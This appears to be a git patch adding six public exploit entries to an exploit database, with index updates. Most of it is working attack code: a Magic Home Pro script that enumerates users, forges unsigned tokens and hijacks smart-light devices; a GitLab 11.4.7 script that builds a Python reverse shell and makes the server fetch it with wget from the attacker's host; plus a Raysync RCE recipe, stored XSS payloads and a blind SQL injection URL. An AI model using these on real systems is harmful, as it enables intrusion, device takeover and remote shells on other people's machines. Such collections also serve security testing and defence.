From 58ad270f640ef1e9de2f9d320e3133690ffb81ae Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 17 Dec 2020 05:01:57 +0000 Subject: [PATCH] DB: 2020-12-17 6 changes to exploits/shellcodes Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption Adobe (Multiple Products) - XML Injection File Content Disclosure GitLab 11.4.7 - Remote Code Execution (Authenticated) Grav CMS 1.6.30 Admin Plugin 1.9.18 - 'Page Title' Persistent Cross-Site Scripting Raysync 3.3.3.8 - RCE Magic Home Pro 1.5.1 - Authentication Bypass PrestaShop ProductComments 4.2.0 - 'id_products' Time Based Blind SQL Injection Seotoaster 3.2.0 - Stored XSS on Edit page properties --- exploits/android/webapps/49266.py | 292 ++++++++++++++++++++++++++++++ exploits/linux/webapps/49265.txt | 25 +++ exploits/php/webapps/49264.txt | 45 +++++ exploits/php/webapps/49267.txt | 14 ++ exploits/php/webapps/49268.txt | 29 +++ exploits/ruby/webapps/49263.py | 262 +++++++++++++++++++++++++++ files_exploits.csv | 10 +- 7 files changed, 675 insertions(+), 2 deletions(-) create mode 100755 exploits/android/webapps/49266.py create mode 100644 exploits/linux/webapps/49265.txt create mode 100644 exploits/php/webapps/49264.txt create mode 100644 exploits/php/webapps/49267.txt create mode 100644 exploits/php/webapps/49268.txt create mode 100755 exploits/ruby/webapps/49263.py diff --git a/exploits/android/webapps/49266.py b/exploits/android/webapps/49266.py new file mode 100755 index 000000000..bd5b0c746 --- /dev/null +++ b/exploits/android/webapps/49266.py @@ -0,0 +1,292 @@ +# Exploit Title: Magic Home Pro 1.5.1 - Authentication Bypass +# Google Dork: NA +# Date: 22 October 2020 +# Exploit Author: Victor Hanna (Trustwave SpiderLabs) +# Author Github Page: https://9lyph.github.io/CVE-2020-27199/ +# Vendor Homepage: http://www.zengge.com/appkzd +# Software Link: https://play.google.com/store/apps/details?id=com.zengge.wifi&hl=en +# Version: 1.5.1 (REQUIRED) +# Tested on: Android 10 + +## Enumeration ## + +import requests +import json +import os +from colorama import init +from colorama import Fore, Back, Style +import re + +''' +1. First Stage Authentication +2. Second Stage Enumerate +3. Third Stage Remote Execute +''' + +global found_macaddresses +found_macaddresses = [] +global outtahere +outtahere = "" +q = "q" +global token + + +def turnOn(target, token): + + urlOn = "https://wifij01us.magichue.net/app/sendCommandBatch/ZG001" + array = { + "dataCommandItems":[ + {"hexData":"71230fa3","macAddress":target} + ] + } + data = json.dumps(array) + headersOn = { + "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)", + "Accept-Language": "en-US", + "Accept": "application/json", + "Content-Type": "application/json; charset=utf-8", + "token":token, + "Host": "wifij01us.magichue.net", + "Connection": "close", + "Accept-Encoding": "gzip, deflate" + } + print (Fore.WHITE + "[+] Sending Payload ...") + response = requests.post(urlOn, data=data, headers=headersOn) + if response.status_code == 200: + if "true" in response.text: + print (Fore.GREEN + "[*] Endpoint " + Style.RESET_ALL + f"{target}" + Fore.GREEN + " Switched On") + else: + print (Fore.RED + "[-] Failed to switch on Endpoint " + Style.RESET_ALL + f"{target}") + +def turnOff(target, token): + + urlOff = "https://wifij01us.magichue.net/app/sendCommandBatch/ZG001" + array = { + "dataCommandItems":[ + {"hexData":"71240fa4","macAddress":target} + ] + } + data = json.dumps(array) + headersOff = { + "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)", + "Accept-Language": "en-US", + "Accept": "application/json", + "Content-Type": "application/json; charset=utf-8", + "token":token, + "Host": "wifij01us.magichue.net", + "Connection": "close", + "Accept-Encoding": "gzip, deflate" + } + print (Fore.WHITE + "[+] Sending Payload ...") + response = requests.post(urlOff, data=data, headers=headersOff) + if response.status_code == 200: + if "true" in response.text: + print (Fore.GREEN + "[*] Endpoint " + Style.RESET_ALL + f"{target}" + Fore.GREEN + " Switched Off") + else: + print (Fore.RED + "[-] Failed to switch on Endpoint " + Style.RESET_ALL + f"{target}") + +def lighItUp(target, token): + + outtahere = "" + q = "q" + if len(str(target)) < 12: + print (Fore.RED + "[!] Invalid target" + Style.RESET_ALL) + elif re.match('[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}$', target.lower()): + while outtahere.lower() != q.lower(): + if outtahere == "0": + turnOn(target, token) + elif outtahere == "1": + turnOff(target, token) + outtahere = input(Fore.BLUE + "ON/OFF/QUIT ? (0/1/Q): " + Style.RESET_ALL) + +def Main(): + urlAuth = "https://wifij01us.magichue.net/app/login/ZG001" + + data = { + "userID":"", + "password":"", + "clientID":"" + } + + headersAuth = { + "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)", + "Accept-Language": "en-US", + "Accept": "application/json", + "Content-Type": "application/json; charset=utf-8", + "Host": "wifij01us.magichue.net", + "Connection": "close", + "Accept-Encoding": "gzip, deflate" + } + + # First Stage Authenticate + + os.system('clear') + print (Fore.WHITE + "[+] Authenticating ...") + response = requests.post(urlAuth, json=data, headers=headersAuth) + resJsonAuth = response.json() + token = (resJsonAuth['token']) + + # Second Stage Enumerate + + print (Fore.WHITE + "[+] Enumerating ...") + macbase = "C82E475DCE" + macaddress = [] + a = ["%02d" % x for x in range(100)] + for num in a: + macaddress.append(macbase+num) + + with open('loot.txt', 'w') as f: + for mac in macaddress: + urlEnum = "https://wifij01us.magichue.net/app/getBindedUserListByMacAddress/ZG001" + params = { + "macAddress":mac + } + + headersEnum = { + "User-Agent": "Magic Home/1.5.1(ANDROID,9,en-US)", + "Accept-Language": "en-US", + "Content-Type": "application/json; charset=utf-8", + "Accept": "application/json", + "token": token, + "Host": "wifij01us.magichue.net", + "Connection": "close", + "Accept-Encoding": "gzip, deflate" + } + + response = requests.get(urlEnum, params=params, headers=headersEnum) + resJsonEnum = response.json() + data = (resJsonEnum['data']) + if not data: + pass + elif data: + found_macaddresses.append(mac) + print (Fore.GREEN + "[*] MAC Address Identified: " + Style.RESET_ALL + f"{mac}" + Fore.GREEN + f", User: " + Style.RESET_ALL + f"{(data[0]['userName'])}, " + Fore.GREEN + "Unique ID: " + Style.RESET_ALL + f"{data[0]['userUniID']}, " + Fore.GREEN + "Binded ID: " + Style.RESET_ALL + f"{data[0]['bindedUniID']}") + f.write(Fore.GREEN + "[*] MAC Address Identified: " + Style.RESET_ALL + f"{mac}" + Fore.GREEN + f", User: " + Style.RESET_ALL + f"{(data[0]['userName'])}, " + Fore.GREEN + "Unique ID: " + Style.RESET_ALL + f"{data[0]['userUniID']}, " + Fore.GREEN + "Binded ID: " + Style.RESET_ALL + f"{data[0]['bindedUniID']}\n") + else: + print (Fore.RED + "[-] No results found!") + print(Style.RESET_ALL) + + if not found_macaddresses: + print (Fore.RED + "[-] No MAC addresses retrieved") + elif found_macaddresses: + attackboolean = input(Fore.BLUE + "Would you like to Light It Up ? (y/N): " + Style.RESET_ALL) + if (attackboolean.upper() == 'Y'): + target = input(Fore.RED + "Enter a target device mac address: " + Style.RESET_ALL) + lighItUp(target, token) + elif (attackboolean.upper() == 'N'): + print (Fore.CYAN + "Sometimes, belief isn’t about what we can see. It’s about what we can’t."+ Style.RESET_ALL) + else: + print (Fore.CYAN + "The human eye is a wonderful device. With a little effort, it can fail to see even the most glaring injustice." + Style.RESET_ALL) + +if __name__ == "__main__": + Main() + +## Token Forging ## + +#!/usr/local/bin/python3 + +import url64 +import requests +import json +import sys +import os +from colorama import init +from colorama import Fore, Back, Style +import re +import time +from wsgiref.handlers import format_date_time +from datetime import datetime +from time import mktime + +now = datetime.now() +stamp = mktime(now.timetuple()) + +''' +HTTP/1.1 200 +Server: nginx/1.10.3 +Content-Type: application/json;charset=UTF-8 +Connection: close + +"{\"code\":0,\"msg\":\"\",\"data\":{\"webApi\":\"wifij01us.magichue.net/app\",\"webPathOta\":\"http:\/\/wifij01us.magichue.net\/app\/ota\/download\",\"tcpServerController\":\"TCP,8816,ra8816us02.magichue.net\",\"tcpServerBulb\":\"TCP,8815,ra8815us02.magichue.net\",\"tcpServerControllerOld\":\"TCP,8806,mhc8806us.magichue.net\",\"tcpServerBulbOld\":\"TCP,8805,mhb8805us.magichue.net\",\"sslMqttServer\":\"ssl:\/\/192.168.0.112:1883\",\"serverName\":\"Global\",\"serverCode\":\"US\",\"userName\":\"\",\"userEmail\":\"\",\"userUniID\":\"\"},\"token\":\"\"}" +''' + +def Usage(): + print (f"Usage: {sys.argv[0]} ") + +def Main(user, uniqid): + os.system('clear') + print ("[+] Encoding ...") + print ("[+] Bypass header created!") + print ("HTTP/1.1 200") + print ("Server: nginx/1.10.3") + print ("Date: "+str(format_date_time(stamp))+"") + print ("Content-Type: application/json;charset=UTF-8") + print ("Connection: close\r\n\r\n") + + jwt_header = '{"typ": "JsonWebToken","alg": "None"}' + jwt_data = '{"userID": "'+user+'", "uniID": "'+uniqid+'","cdpid": "ZG001","clientID": "","serverCode": "US","expireDate": 1618264850608,"refreshDate": 1613080850608,"loginDate": 1602712850608}' + jwt_headerEncoded = url64.encode(jwt_header.strip()) + jwt_dataEncoded = url64.encode(jwt_data.strip()) + jwtcombined = (jwt_headerEncoded.strip()+"."+jwt_dataEncoded.strip()+".") + print ("{\"code\":0,\"msg\":\"\",\"data\":{\"webApi\":\"wifij01us.magichue.net/app\",\"webPathOta\":\"http://wifij01us.magichue.net/app/ota/download\",\"tcpServerController\":\"TCP,8816,ra8816us02.magichue.net\",\"tcpServerBulb\":\"TCP,8815,ra8815us02.magichue.net\",\"tcpServerControllerOld\":\"TCP,8806,mhc8806us.magichue.net\",\"tcpServerBulbOld\":\"TCP,8805,mhb8805us.magichue.net\",\"sslMqttServer\":\"ssl:\/\/192.168.0.112:1883\",\"serverName\":\"Global\",\"serverCode\":\"US\",\"userName\":\""+user+"\",\"userEmail\":\""+user+"\",\"userUniID\":\""+uniqid+"\"},\"token\":\""+jwtcombined+"\"}") + +if __name__ == "__main__": + if len(sys.argv) < 3: + Usage() + else: + Main(sys.argv[1], sys.argv[2]) + +## Device Takeover PoC ## + +#!/usr/local/bin/python3 + +import url64 +import requests +import json +import sys +import os +from colorama import init +from colorama import Fore, Back, Style +import re + +def Usage(): + print (f"Usage: {sys.argv[0]} ") + +def Main(): + + attacker_email = sys.argv[1] + target_email = sys.argv[2] + target_mac = sys.argv[3] + forged_token = sys.argv[4] + + os.system('clear') + print (Fore.WHITE + "[+] Sending Payload ...") + url = "https://wifij01us.magichue.net/app/shareDevice/ZG001" + + array = {"friendUserID":attacker_email, "macAddress":target_mac} + + data = json.dumps(array) + + headers = { + "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)", + "Accept-Language": "en-US", + "Accept": "application/json", + "Content-Type": "application/json; charset=utf-8", + "token":forged_token, + "Host": "wifij01us.magichue.net", + "Connection": "close", + "Accept-Encoding": "gzip, deflate" + } + + response = requests.post(url, data=data, headers=headers) + if response.status_code == 200: + if "true" in response.text: + print (Fore.GREEN + "[*] Target is now yours ... " + Style.RESET_ALL) + else: + print (Fore.RED + "[-] Failed to take over target !" + Style.RESET_ALL) + +if __name__ == "__main__": + if len(sys.argv) < 5: + Usage() + else: + Main() \ No newline at end of file diff --git a/exploits/linux/webapps/49265.txt b/exploits/linux/webapps/49265.txt new file mode 100644 index 000000000..1a676ee59 --- /dev/null +++ b/exploits/linux/webapps/49265.txt @@ -0,0 +1,25 @@ +# Exploit Title: Raysync 3.3.3.8 - RCE +# Date: 04/10/2020 +# Exploit Author: XiaoLong Zhu +# Vendor Homepage: www.raysync.io +# Version: below 3.3.3.8 +# Tested on: Linux + +step1: run RaysyncServer.sh to build a web application on the local + +environment, set admin password to 123456 , which will be write to + +manage.db file. + +step2: curl "file=@manage.db" http://[raysync +ip]/avatar?account=1&UserId=/../../../../config/manager.db + +to override remote manage.db file in server. + +step3: login in admin portal with admin/123456. + +step4: create a normal file with all permissions in scope. + +step5: modify RaySyncServer.sh ,add arbitrary evil command. + +step6: trigger rce with clicking "reset" button \ No newline at end of file diff --git a/exploits/php/webapps/49264.txt b/exploits/php/webapps/49264.txt new file mode 100644 index 000000000..1fdab4c98 --- /dev/null +++ b/exploits/php/webapps/49264.txt @@ -0,0 +1,45 @@ +# Exploit Title: Grav CMS 1.6.30 Admin Plugin 1.9.18 - 'Page Title' Persistent Cross-Site Scripting +# Date: 13-12-2020 +# Exploit Author: Sagar Banwa +# Vendor Homepage: https://getgrav.org/ +# Software Link: https://getgrav.org/downloads +# Version: Grav v1.6.30 - Admin v1.9.18 +# Tested on: Windows 10/Kali Linux +# Contact: https://www.linkedin.com/in/sagarbanwa/ + +Step to reproduce : + +1) log in to the grav-admin panel +2) Go to Pages +3) Click on Add +4) It will ask to Add Page +5) fill the following details as below + Page Title : + Folder Name : sagar_Banwa + Parent Page : /(root) + Page Template : Default + Value : yes +6) click on the Save button +7) now Click on Pages again. +8) your page name will be listed as +9) Now click on the eye button to see the XSS or you can simply go to http://127.0.0.1/grav-admin/ the XSS will pop-up + +------------------------------------- + +POST /grav-admin/admin/pages HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 230 +Origin: http://127.0.0.1 +Connection: close +Referer: http://127.0.0.1/grav-admin/admin/pages +Cookie: grav-site-a4a23f1-admin=ehrcji8qpnu8e50r839r4oe2on; grav-site-a4a23f1=u5438b49fft2b5d7610a53ne1d; grav-tabs-state={%22tab-options.routes.registration.Security%22:%22data.Security%22%2C%22tab-content.options.advanced%22:%22data.content%22} +Upgrade-Insecure-Requests: 1 + +data%5Btitle%5D=%3Cscript%3Ealert%281337%29%3C%2Fscript%3E&data%5Bfolder%5D=sagar_banwa&data%5Broute%5D=%2F&data%5Bname%5D=default&data%5Bvisible%5D=1&data%5Bblueprint%5D=&task=continue&admin-nonce=d488c0d8bdaf2978d50f174942d5279f + +----------------------------- \ No newline at end of file diff --git a/exploits/php/webapps/49267.txt b/exploits/php/webapps/49267.txt new file mode 100644 index 000000000..afbecfd5e --- /dev/null +++ b/exploits/php/webapps/49267.txt @@ -0,0 +1,14 @@ +​# Exploit Title: PrestaShop ProductComments 4.2.0 - 'id_products' Time Based Blind SQL Injection +# Date: 2020-12-15 +# Exploit Author: Frederic ADAM +# Author contact: contact@fadam.eu +# Vendor Homepage: https://www.prestashop.com +# Software Link: https://github.com/PrestaShop/productcomments +# Version: 4.2.0 +# Tested on: Debian 10 +# CVE : CVE-2020-26248 + +http://localhost/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=[SQL] + +Example: +http://localhost/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(2)))a) \ No newline at end of file diff --git a/exploits/php/webapps/49268.txt b/exploits/php/webapps/49268.txt new file mode 100644 index 000000000..8d1d21095 --- /dev/null +++ b/exploits/php/webapps/49268.txt @@ -0,0 +1,29 @@ +# Exploit Title: Seotoaster 3.2.0 - Stored XSS on Edit page properties +# Exploit Author: Hardik Solanki +# Vendor Homepage: https://www.seotoaster.com/ +# Software Link: https://crm-marketing-automation-platforms.seotoaster.com/ +# Version: 3.2.0 +# Tested on Windows 10 + +XSS ATTACK: +Cross-site Scripting (XSS) is a client-side code injection attack. The +attacker aims to execute malicious scripts in a web browser of the victim +by including malicious code in a legitimate web page or web application. +The actual attack occurs when the victim visits the web page or web +application that executes the malicious code. The web page or web +application becomes a vehicle to deliver the malicious script to the user’s +browser. Vulnerable vehicles that are commonly used for Cross-site +Scripting attacks are forums, message boards, and web pages that allow +comments. + +XSS IMPACT: +1: Steal the cookie +2: User redirection to a malicious website + +Vulnerable Parameters: Edit page properties + +Steps to reproduce: +1: Navigate to "https://localhost/" and log in with valid credentials. +2: Then navigates/click on "Edit page properties". +3: Add the payload "*">*", on "Page header H1 tag" field and click on "Save Page" button. Page Saved succesfully. +4: Hence XSS will get stored and trigger on the main home/main page. \ No newline at end of file diff --git a/exploits/ruby/webapps/49263.py b/exploits/ruby/webapps/49263.py new file mode 100755 index 000000000..792c682a8 --- /dev/null +++ b/exploits/ruby/webapps/49263.py @@ -0,0 +1,262 @@ +# Exploit Title: GitLab 11.4.7 Authenticated Remote Code Execution (No Interaction Required) +# Date: 15th December 2020 +# Exploit Author: Mohin Paramasivam (Shad0wQu35t) +# Software Link: https://about.gitlab.com/ +# POC: https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/ +# Tested on: GitLab 11.4.7 CE +# CVE : CVE-2018-19571 (SSRF),CVE-2018-19585 (CRLF) + +import requests +import re +import warnings +from bs4 import BeautifulSoup +import sys +import base64 +import urllib +from random_words import RandomWords +import argparse +import os +import time + + + + +parser = argparse.ArgumentParser(description='GitLab 11.4.7 Authenticated RCE') +parser.add_argument('-U',help='GitLab Username') +parser.add_argument('-P',help='Gitlab Password') +parser.add_argument('-l',help='rev shell lhost') +parser.add_argument('-p',help='rev shell lport ',type=int) +args = parser.parse_args() + + +username = args.U +password = args.P +lhost = args.l +lport = args.p + + +#Retrieve CSRF Token + +warnings.filterwarnings("ignore", category=UserWarning, module='bs4') +gitlab_url = "http://10.129.49.62:5080" +request = requests.Session() +print("[+] Retrieving CSRF token to submit the login form") +time.sleep(1) +page = request.get(gitlab_url+"/users/sign_in") +html_content = page.text +soup = BeautifulSoup(html_content,features="lxml") +token = soup.findAll('meta')[16].get("content") + + +print("[+] CSRF Token : "+token) +time.sleep(1) + + +#Login + +login_info ={ + "authenticity_token": token, + "user[login]": username, + "user[password]": password, + "user[remember_me]": "0" +} + + +login_request = request.post(gitlab_url+"/users/sign_in",login_info) + + +if login_request.status_code==200: + print("[+] Login Successful") + time.sleep(1) + +else: + + print("Login Failed") + print(" ") + sys.exit() + + + + +#Exploitation + +print("[+] Running Exploit") +time.sleep(1) +print("[+] Using IPV6 URL 'git://[0:0:0:0:0:ffff:127.0.0.1]:6379/test/ssrf.git' to bypass filter") +time.sleep(1) + +ipv6_url = "git%3A%2F%2F%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A6379%2Ftest%2Fssrf.git" + + +r = RandomWords() +project_name = r.random_word() +project_url = '%s/%s/'%(gitlab_url,username) + +print("[+] Creating Project") +time.sleep(1) +print("[+] Project Name : "+project_name) +time.sleep(1) + +print("[+] Creating Python Reverse Shell") +time.sleep(1) + + +python_shell = 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'%(lhost,lport) + + +os.system("touch shell.py") +shell_file = open("shell.py","w") +shell_file.write(python_shell) +shell_file.close() + + +print("[+] Reverse Shell Generated") +time.sleep(1) + +print("[+] Start HTTP Server in current directory") + + +print("Command : python3 -m http.server 80") +time.sleep(2) + +http_server = raw_input("Continue (Y/N) : ") + +if (http_server=="N") or (http_server=="n"): + print("Start HTTP Server before running exploit") + +elif (http_server=="Y") or (http_server=="y"): + + + + print("Run this script twice with options below to get SHELL!") + print("") + print("Option 1 : Download shell.py rev shell to server using wget") + print("Option 2 : Execute shell.py downloaded previously") + + option = raw_input("Option (1/2) : ") + + + if option=="1": + + + + reverse_shell= """\nmulti + sadd resque:gitlab:queues system_hook_push + lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|setsid wget http://%s/shell.py \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1513714403.8122594,\\"enqueued_at\\":1513714403.8129568}" + exec + exec + exec\n""" %(lhost) + + + project_page = request.get(gitlab_url+"/projects/new") + html_content = project_page.text + soup = BeautifulSoup(html_content,features="lxml") + project_token = soup.findAll('meta')[16].get("content") + namespace_id = soup.find('input', {'name': 'project[namespace_id]'}).get('value') + urlencoded_token1 = project_token.replace("==","%3D%3D") + urlencoded_token_final = urlencoded_token1.replace("+","%2B") + + + payload=b"utf8=%E2%9C%93&authenticity_token={}&project%5Bimport_url%5D={}{}&project%5Bci_cd_only%5D=false&project%5Bname%5D={}&project%5Bnamespace_id%5D={}&project%5Bpath%5D={}&project%5Bdescription%5D=&project%5Bvisibility_level%5D=0".format(urlencoded_token_final,ipv6_url,reverse_shell,project_name,namespace_id,project_name) + + + + + + + proxies = { + "http" : "http://127.0.0.1:8080", + "https" : "https://127.0.0.1:8080", + } + + cookies = { + 'sidebar_collapsed': 'false', + 'event_filter': 'all', + 'hide_auto_devops_implicitly_enabled_banner_1': 'false', + '_gitlab_session':request.cookies['_gitlab_session'], + } + + headers = { + 'Host': '10.129.49.31:5080', + 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Accept-Language': 'en-US,en;q=0.5', + 'Accept-Encoding': 'gzip, deflate', + 'Referer': 'http://10.129.49.31:5080/projects', + 'Content-Type': 'application/x-www-form-urlencoded', + 'Content-Length': '398', + 'Connection': 'close', + 'Upgrade-Insecure-Requests': '1', + } + + + + #response = request.post('http://10.129.49.31:5080/projects',data=payload,proxies=proxies,cookies=cookies,headers=headers,verify=False) + + response1 = request.post(gitlab_url+'/projects',data=payload,cookies=cookies,proxies=proxies,headers=headers,verify=False) + print("[+] Success!") + time.sleep(1) + print("[+] Run Exploit with Option 2") + + + elif option=="2": + + reverse_shell= """\nmulti + sadd resque:gitlab:queues system_hook_push + lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|setsid python3 shell.py \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1513714403.8122594,\\"enqueued_at\\":1513714403.8129568}" + exec + exec + exec\n""" + + + + + project_page = request.get(gitlab_url+"/projects/new") + html_content = project_page.text + soup = BeautifulSoup(html_content,features="lxml") + project_token = soup.findAll('meta')[16].get("content") + namespace_id = soup.find('input', {'name': 'project[namespace_id]'}).get('value') + urlencoded_token1 = project_token.replace("==","%3D%3D") + urlencoded_token_final = urlencoded_token1.replace("+","%2B") + + + payload=b"utf8=%E2%9C%93&authenticity_token={}&project%5Bimport_url%5D={}{}&project%5Bci_cd_only%5D=false&project%5Bname%5D={}&project%5Bnamespace_id%5D={}&project%5Bpath%5D={}&project%5Bdescription%5D=&project%5Bvisibility_level%5D=0".format(urlencoded_token_final,ipv6_url,reverse_shell,project_name,namespace_id,project_name) + + + + + + + proxies = { + "http" : "http://127.0.0.1:8080", + "https" : "https://127.0.0.1:8080", + } + + cookies = { + 'sidebar_collapsed': 'false', + 'event_filter': 'all', + 'hide_auto_devops_implicitly_enabled_banner_1': 'false', + '_gitlab_session':request.cookies['_gitlab_session'], + } + + headers = { + 'Host': '10.129.49.31:5080', + 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Accept-Language': 'en-US,en;q=0.5', + 'Accept-Encoding': 'gzip, deflate', + 'Referer': 'http://10.129.49.31:5080/projects', + 'Content-Type': 'application/x-www-form-urlencoded', + 'Content-Length': '398', + 'Connection': 'close', + 'Upgrade-Insecure-Requests': '1', + } + + + + #response = request.post('http://10.129.49.31:5080/projects',data=payload,proxies=proxies,cookies=cookies,headers=headers,verify=False) + + response1 = request.post(gitlab_url+'/projects',data=payload,cookies=cookies,proxies=proxies,headers=headers,verify=False) + print("[+] Success!") + time.sleep(1) + print("[+] Spawning Reverse Shell") \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 1bda1cfd5..55c7f9931 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11228,7 +11228,7 @@ id,file,description,date,author,type,platform,port 49203,exploits/windows/local/49203.txt,"Rumble Mail Server 0.51.3135 - 'rumble_win32.exe' Unquoted Service Path",2020-12-07,"Mohammed Alshehri",local,windows, 49205,exploits/windows/local/49205.txt,"Kite 1.2020.1119.0 - 'KiteService' Unquoted Service Path",2020-12-07,"Ismael Nava",local,windows, 49211,exploits/windows/local/49211.ps1,"Druva inSync Windows Client 6.6.3 - Local Privilege Escalation (PowerShell)",2020-12-07,1F98D,local,windows, -49221,exploits/multiple/local/49221.java,"Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption",2020-12-09,"Thomas Sluyter",local,multiple, +49221,exploits/multiple/local/49221.java,"Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption",2020-12-09,"Tess Sluyter",local,multiple, 49226,exploits/windows/local/49226.txt,"PDF Complete 3.5.310.2002 - 'pdfsvc.exe' Unquoted Service Path",2020-12-10,"Zaira Alquicira",local,windows, 49248,exploits/windows/local/49248.txt,"System Explorer 7.0.0 - 'SystemExplorerHelpService' Unquoted Service Path",2020-12-14,"Mohammed Alshehri",local,windows, 49259,exploits/linux/local/49259.c,"libbabl 0.1.62 - Broken Double Free Detection (PoC)",2020-12-15,"Carter Yagemann",local,linux, @@ -40317,7 +40317,7 @@ id,file,description,date,author,type,platform,port 42090,exploits/multiple/webapps/42090.txt,"KEMP LoadMaster 7.135.0.13245 - Persistent Cross-Site Scripting / Remote Code Execution",2017-05-30,SecuriTeam,webapps,multiple, 42091,exploits/windows/webapps/42091.txt,"IBM Informix Dynamic Server / Informix Open Admin Tool - DLL Injection / Remote Code Execution / Heap Buffer Overflow",2017-05-30,SecuriTeam,webapps,windows, 41849,exploits/php/webapps/41849.txt,"Jobscript4Web 4.5 - Authentication Bypass",2017-04-08,TurkCyberArmy,webapps,php, -41855,exploits/xml/webapps/41855.sh,"Adobe (Multiple Products) - XML Injection File Content Disclosure",2017-04-07,"Thomas Sluyter",webapps,xml,8400 +41855,exploits/xml/webapps/41855.sh,"Adobe (Multiple Products) - XML Injection File Content Disclosure",2017-04-07,"Tess Sluyter",webapps,xml,8400 41856,exploits/php/webapps/41856.txt,"MyClassifiedScript 5.1 - SQL Injection",2017-04-11,"Ihsan Sencan",webapps,php, 41858,exploits/php/webapps/41858.txt,"Social Directory Script 2.0 - SQL Injection",2017-04-11,"Ihsan Sencan",webapps,php, 41859,exploits/php/webapps/41859.txt,"FAQ Script 3.1.3 - 'category_id' SQL Injection",2017-04-11,"Ihsan Sencan",webapps,php, @@ -43481,3 +43481,9 @@ id,file,description,date,author,type,platform,port 49258,exploits/php/webapps/49258.txt,"Task Management System 1.0 - 'page' Local File Inclusion",2020-12-15,"İsmail BOZKURT",webapps,php, 49260,exploits/php/webapps/49260.py,"Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (Authenticated)",2020-12-15,"Andrea Bruschi",webapps,php, 49262,exploits/hardware/webapps/49262.py,"Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2)",2020-12-15,Freakyclown,webapps,hardware, +49263,exploits/ruby/webapps/49263.py,"GitLab 11.4.7 - Remote Code Execution (Authenticated)",2020-12-16,"Mohin Paramasivam",webapps,ruby, +49264,exploits/php/webapps/49264.txt,"Grav CMS 1.6.30 Admin Plugin 1.9.18 - 'Page Title' Persistent Cross-Site Scripting",2020-12-16,"Sagar Banwa",webapps,php, +49265,exploits/linux/webapps/49265.txt,"Raysync 3.3.3.8 - RCE",2020-12-16,james,webapps,linux, +49266,exploits/android/webapps/49266.py,"Magic Home Pro 1.5.1 - Authentication Bypass",2020-12-16,"Victor Hanna",webapps,android, +49267,exploits/php/webapps/49267.txt,"PrestaShop ProductComments 4.2.0 - 'id_products' Time Based Blind SQL Injection",2020-12-16,"Frederic ADAM",webapps,php, +49268,exploits/php/webapps/49268.txt,"Seotoaster 3.2.0 - Stored XSS on Edit page properties",2020-12-16,"Hardik Solanki",webapps,php,